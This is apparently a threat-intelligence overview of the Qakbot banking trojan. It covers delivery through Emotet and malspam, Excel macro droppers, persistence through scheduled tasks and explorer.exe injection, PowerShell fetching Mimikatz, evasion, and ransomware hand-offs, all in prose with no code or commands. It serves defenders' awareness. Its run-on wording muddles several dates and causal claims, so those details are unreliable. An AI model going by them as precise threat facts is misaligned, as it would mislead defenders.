Qakbot, aka Pinkslipbot, Quakbot & Qbot was detected back in 2007, is a family of nefarious banking Trojan also known for behaving like a network worm has evolved to primarily extort financial credentials, online banking session information with various loopholes in operational use open in the wild; operated mainly by financially motivated threat actor groups referred to as GOLD LAGOON, leading to account confiscation fraud by incorporating multiple techniques, tactics & procedures (TTP), including its delivery mechanisms, C2 servers for payload deliveries and infrastructures to deter the recovery of malicious payloads from preventing security analysis and research attempts, anti-analysis, and reversing features heavily progressed over the years. It is a modular malware framework that supports numerous capabilities such as spam delivery, credential theft, interception & web traffic manipulation with webinjects and remote access.

Qakbot is further evaluated as a polymorphic threat that facilitates modifying itself even though it has infected an endpoint. With that, it can often modify files, including the payloads involved, resulting in newer variants continuously cycling through C2 servers.

The amalgamation of all these capabilities confirms that Qakbot remains a critical threat responsible for executing numerous successful attacks on various organizations, including governmental structures, worldwide, followed by the infection of tens of thousands of hosts and high financial losses for both victims and their associated financial institutions.

Qakbot was resurrected by other malware such as EMOTET, which is also an infamous threat distributing Qakbot via malicious unsolicited email campaigns considered as infection vectors such as malspam, exploit kits, the second stage (often dropped by Emotet), and visual Basic script downloaders in a recent Qakbot campaigns have reportedly deployed 'Cobalt Strike' beacons likely in an attempt to move laterally as well as gaining persistence and stabilizing a robust communication channel back to the threat actor as a gateway entry, similar to TrickBot or Emotet, that leads to post-exploitation operations leveraging frameworks in delivering Ransomware until February 2020 as a second-stage download from the Emotet botnet.

These cyberattacks primarily redirect to a malicious web page and use an Excel document as a dropper. Thereby, the main malicious file is downloaded with the help of macro codes in the excel document, labeled as the dropper. Droppers are a malicious component that works to download the actual ransomware while leaving a copy of itself on the machine and creates a scheduled task for autorun recording and persistence. It also injects itself into the explorer.exe process.

Emotet has been taken down recently; however, QakBot operators have started to leverage specially targeted campaigns to disseminate this threat around the globe poised to fill the gap. It utilizes antivirus evasion, anti-detection & anti-sandbox tactics across the entire spectrum of the attack.

Qakbot can self-propagate just like Emotet attempting to brute force the access to circulating across networks and uses “living-off-the-land” tools to propagate. It uses PowerShell to download and run Mimikatz (Hacktool.Mimikatz), an open-source modular stealing tool allowing threat actors to proceed rapidly across a network once the initial foothold has been established.

Qakbot was observed testing several enhancements in August 2020. The trojan was updated in June 2020 with a renewed command and control infrastructure and new functions and stealthy capabilities in order to avoid detection and analysis. Qakbot also speculatively appeared as malware-as-a-Service when it was found it served the ProLock and MegaCortex ransomware in May 2020 to gain access to the infected networks. Besides, they were also found adding scheduled tasks on infected systems.